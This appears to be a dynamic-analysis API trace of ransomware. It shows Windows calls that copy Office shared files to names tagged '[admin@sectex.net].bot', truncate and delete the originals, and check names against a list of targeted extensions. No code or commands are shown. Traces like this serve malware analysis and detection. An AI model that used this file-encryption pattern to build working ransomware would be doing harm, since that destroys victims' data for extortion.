	[0046.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0046.765] GetFileSizeEx (in: hFile=0x220, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=937) returned 1
	[0046.765] CloseHandle (hObject=0x220) returned 1
	[0046.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 0x20
	[0046.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0046.765] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.765] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0047.684] GetLastError () returned 0x0
	[0047.684] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x3a9, lpOverlapped=0x0) returned 1
	[0047.705] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x3b0, lpOverlapped=0x0) returned 1
	[0047.705] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.706] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.706] SetEndOfFile (hFile=0x21c) returned 1
	[0047.706] CloseHandle (hObject=0x21c) returned 1
	[0047.706] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.706] SetEndOfFile (hFile=0x220) returned 1
	[0047.707] CloseHandle (hObject=0x220) returned 1
	[0047.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.707] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 1
	[0047.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.707] lstrlenW (lpString=".doc") returned 4
	[0047.707] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.707] lstrlenW (lpString=".docx") returned 5
	[0047.707] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.707] lstrlenW (lpString=".pdf") returned 4
	[0047.707] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.707] lstrlenW (lpString=".xls") returned 4
	[0047.707] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.707] lstrlenW (lpString=".xlsx") returned 5
	[0047.707] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.707] lstrlenW (lpString=".ppt") returned 4
	[0047.707] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString=".zip") returned 4
	[0047.708] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString=".rar") returned 4
	[0047.708] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString=".bz2") returned 4
	[0047.708] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.708] lstrlenW (lpString=".7z") returned 3
	[0047.708] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString=".dbf") returned 4
	[0047.708] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString=".1cd") returned 4
	[0047.708] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString=".jpg") returned 4
	[0047.708] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString=".doc") returned 4
	[0047.708] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.708] lstrlenW (lpString=".docx") returned 5
	[0047.708] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.708] lstrlenW (lpString=".pdf") returned 4
	[0047.708] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString=".xls") returned 4
	[0047.708] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString=".xlsx") returned 5
	[0047.708] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.708] lstrlenW (lpString=".ppt") returned 4
	[0047.708] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.708] lstrlenW (lpString=".zip") returned 4
	[0047.709] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.709] lstrlenW (lpString=".rar") returned 4
	[0047.709] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.709] lstrlenW (lpString=".bz2") returned 4
	[0047.709] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.709] lstrlenW (lpString=".7z") returned 3
	[0047.709] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.709] lstrlenW (lpString=".dbf") returned 4
	[0047.709] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.709] lstrlenW (lpString=".1cd") returned 4
	[0047.709] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71
	[0047.709] lstrlenW (lpString=".jpg") returned 4
	[0047.709] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.709] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0047.709] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0047.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.032] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=33479) returned 1
	[0048.032] CloseHandle (hObject=0x214) returned 1
	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 0x20
	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.032] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.032] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.033] GetLastError () returned 0x0
	[0048.033] ReadFile (in: hFile=0x214, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x82c7, lpOverlapped=0x0) returned 1
	[0048.035] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x82d0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x82d0, lpOverlapped=0x0) returned 1
	[0048.036] ReadFile (in: hFile=0x214, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.036] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0048.036] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.036] CloseHandle (hObject=0x1d0) returned 1
	[0048.037] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.037] SetEndOfFile (hFile=0x214) returned 1
	[0048.037] CloseHandle (hObject=0x214) returned 1
	[0048.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.038] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1
	[0048.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.038] lstrlenW (lpString=".doc") returned 4
	[0048.038] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0048.038] lstrlenW (lpString=".docx") returned 5
	[0048.038] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0048.038] lstrlenW (lpString=".pdf") returned 4
	[0048.038] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0048.038] lstrlenW (lpString=".xls") returned 4
	[0048.038] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0048.038] lstrlenW (lpString=".xlsx") returned 5
	[0048.038] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0048.038] lstrlenW (lpString=".ppt") returned 4
	[0048.038] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0048.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.038] lstrlenW (lpString=".zip") returned 4
	[0048.038] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0048.038] lstrlenW (lpString=".rar") returned 4
	[0048.038] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0048.039] lstrlenW (lpString=".bz2") returned 4
	[0048.039] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0048.039] lstrlenW (lpString=".7z") returned 3
	[0048.039] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0048.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.039] lstrlenW (lpString=".dbf") returned 4
	[0048.039] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0048.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.039] lstrlenW (lpString=".1cd") returned 4
	[0048.039] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0048.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.039] lstrlenW (lpString=".jpg") returned 4
	[0048.039] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0048.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.039] lstrlenW (lpString=".doc") returned 4
	[0048.039] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0048.039] lstrlenW (lpString=".docx") returned 5
	[0048.039] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0048.039] lstrlenW (lpString=".pdf") returned 4
	[0048.039] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0048.039] lstrlenW (lpString=".xls") returned 4
	[0048.039] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0048.039] lstrlenW (lpString=".xlsx") returned 5
	[0048.039] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0048.039] lstrlenW (lpString=".ppt") returned 4
	[0048.039] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0048.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.039] lstrlenW (lpString=".zip") returned 4
	[0048.040] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0048.040] lstrlenW (lpString=".rar") returned 4
	[0048.040] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0048.040] lstrlenW (lpString=".bz2") returned 4
	[0048.040] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0048.040] lstrlenW (lpString=".7z") returned 3
	[0048.040] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0048.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.040] lstrlenW (lpString=".dbf") returned 4
	[0048.040] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0048.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.040] lstrlenW (lpString=".1cd") returned 4
	[0048.040] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0048.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77
	[0048.040] lstrlenW (lpString=".jpg") returned 4
	[0048.040] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0048.040] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.040] lstrlenW (lpString="FM20.CHM") returned 8
	[0048.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.041] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=334427) returned 1
	[0048.041] CloseHandle (hObject=0x214) returned 1
	[0048.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 0x20
	[0048.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.041] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.041] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.042] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.042] GetLastError () returned 0x0
	[0048.042] ReadFile (in: hFile=0x214, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x51a5b, lpOverlapped=0x0) returned 1
	[0048.049] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x51a60, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x51a60, lpOverlapped=0x0) returned 1
	[0048.054] ReadFile (in: hFile=0x214, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.055] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0048.055] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.055] CloseHandle (hObject=0x1d0) returned 1
	[0048.055] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.055] SetEndOfFile (hFile=0x214) returned 1
	[0048.058] CloseHandle (hObject=0x214) returned 1
	[0048.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.058] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 1
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.059] lstrlenW (lpString=".doc") returned 4
	[0048.059] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString=".docx") returned 5
	[0048.059] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1
	[0048.059] lstrlenW (lpString=".pdf") returned 4
	[0048.059] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString=".xls") returned 4
	[0048.059] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString=".xlsx") returned 5
	[0048.059] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1
	[0048.059] lstrlenW (lpString=".ppt") returned 4
	[0048.059] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.059] lstrlenW (lpString=".zip") returned 4
	[0048.059] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString=".rar") returned 4
	[0048.059] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString=".bz2") returned 4
	[0048.059] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.059] lstrlenW (lpString=".7z") returned 3
	[0048.059] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.059] lstrlenW (lpString=".dbf") returned 4
	[0048.059] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.059] lstrlenW (lpString=".1cd") returned 4
	[0048.059] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.059] lstrlenW (lpString=".jpg") returned 4
	[0048.059] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.060] lstrlenW (lpString=".doc") returned 4
	[0048.060] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString=".docx") returned 5
	[0048.060] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1
	[0048.060] lstrlenW (lpString=".pdf") returned 4
	[0048.060] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString=".xls") returned 4
	[0048.060] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString=".xlsx") returned 5
	[0048.060] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1
	[0048.060] lstrlenW (lpString=".ppt") returned 4
	[0048.060] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.060] lstrlenW (lpString=".zip") returned 4
	[0048.060] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString=".rar") returned 4
	[0048.060] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString=".bz2") returned 4
	[0048.060] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.060] lstrlenW (lpString=".7z") returned 3
	[0048.060] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.060] lstrlenW (lpString=".dbf") returned 4
	[0048.060] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.060] lstrlenW (lpString=".1cd") returned 4
	[0048.060] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
